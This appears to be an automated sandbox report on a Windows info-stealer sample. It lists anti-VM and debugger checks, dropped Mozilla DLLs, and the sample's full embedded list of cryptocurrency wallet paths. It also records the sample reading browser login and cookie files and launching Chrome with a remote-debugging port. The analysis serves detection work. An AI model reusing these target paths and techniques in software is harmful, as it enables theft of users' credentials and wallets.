Malware Analysis System Evasion

Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 82F5DE
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 8A2DB1
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 84B092
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 8AE047
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 70B67D
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 6C0247
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 79AFB6
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: B197D0
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 7301DA
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 72E8D0
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 84AC9A
Source: C:\Users\user\Desktop\gYjK72gL17.exe API/Special instruction interceptor: Address: 755B20
Source: C:\Users\user\Desktop\gYjK72gL17.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\gYjK72gL17.exe API coverage: 0.8 %
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C99C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C99C930
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: DBKFHCFB.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: DBKFHCFB.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: DBKFHCFB.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: DBKFHCFB.0.dr Binary or memory string: discord.comVMware20,11696487552f
Source: DBKFHCFB.0.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: DBKFHCFB.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: gYjK72gL17.exe, 00000000.00000003.2442011468.0000000001586000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001586000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: DBKFHCFB.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: DBKFHCFB.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: DBKFHCFB.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: DBKFHCFB.0.dr Binary or memory string: global block list test formVMware20,11696487552
Source: DBKFHCFB.0.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: DBKFHCFB.0.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: DBKFHCFB.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: DBKFHCFB.0.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: DBKFHCFB.0.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: DBKFHCFB.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: DBKFHCFB.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: DBKFHCFB.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: DBKFHCFB.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001551000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: DBKFHCFB.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: DBKFHCFB.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: DBKFHCFB.0.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: DBKFHCFB.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001527000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: DBKFHCFB.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: DBKFHCFB.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: DBKFHCFB.0.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: DBKFHCFB.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: DBKFHCFB.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: DBKFHCFB.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: DBKFHCFB.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: DBKFHCFB.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\gYjK72gL17.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9E5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C9E5FF0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C983480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6C983480
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9BB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C9BB66C
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9BB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C9BB1F7
Source: C:\Users\user\Desktop\gYjK72gL17.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: gYjK72gL17.exe PID: 4512, type: MEMORYSTR
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9BB341 cpuid 0_2_6C9BB341
Source: C:\Users\user\Desktop\gYjK72gL17.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\gYjK72gL17.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\gYjK72gL17.exe Code function: 0_2_6C9835A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C9835A0

Stealing of Sensitive Information

Source: Yara match File source: 0.2.gYjK72gL17.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2607101722.0000000001527000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2605576671.00000000001EB000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: gYjK72gL17.exe PID: 4512, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: gYjK72gL17.exe PID: 4512, type: MEMORYSTR
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000275000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: Electrum
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000244000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000275000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: \Electrum\wallets\
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000327000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: Jaxx Liberty
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000275000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: exodus.conf.json
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000275000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000275000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: ElectrumLTC
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000275000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: \Ethereum\
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000275000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: Exodus
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000275000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: Ethereum
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000327000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000275000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: keystore
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000275000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*
Source: C:\Users\user\Desktop\gYjK72gL17.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\gYjK72gL17.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\Desktop\gYjK72gL17.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\gYjK72gL17.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Desktop\gYjK72gL17.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Desktop\gYjK72gL17.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: Yara match File source: 0.2.gYjK72gL17.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2605632956.0000000000294000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: gYjK72gL17.exe PID: 4512, type: MEMORYSTR

Remote Access Functionality

Source: C:\Users\user\Desktop\gYjK72gL17.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: Yara match File source: 0.2.gYjK72gL17.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2607101722.0000000001527000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2605576671.00000000001EB000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: gYjK72gL17.exe PID: 4512, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: gYjK72gL17.exe PID: 4512, type: MEMORYSTR